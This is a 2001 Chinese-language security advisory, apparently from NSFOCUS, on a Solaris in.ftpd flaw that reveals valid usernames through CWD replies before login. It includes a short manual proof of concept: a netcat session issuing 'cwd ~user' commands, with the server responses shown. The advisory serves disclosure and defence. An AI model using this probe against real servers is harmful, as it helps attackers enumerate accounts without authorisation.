安全研究
安全漏洞
Solaris IN.FTPD CWD 用户名猜测漏洞
发布日期:2001-04-19
更新日期:2001-04-19
受影响系统:
Solaris 8 (SPARC, x86)
Solaris 7 (SPARC, x86)
Solaris 2.6/2.5以及更低版本 (SPARC, x86)
描述:
BUGTRAQ ID: 2564
Solaris 所带的in.ftpd没有正确考虑用户登录之前执行某些命令的情况。
因此用户在登录进入系统之前执行某些FTP命令,in.ftpd将会返回一些错
误信息。这可能给攻击者以猜测系统中用户名的机会。
<*来源:Johnny Cyberpunk (
johncybpk@gmx.net) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
nc vulnerable.host 21
220 gsmms0 FTP server (SunOS 5.6) ready.
cwd ~netadm
530 Please login with USER and PASS.
cwd ~xyz
530 Please login with USER and PASS.
550 Unknown user name after ~
建议:
临时解决方法:
如果您不需要FTP服务,请暂时关闭FTP.
厂商补丁:
暂无
浏览次数:3944
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |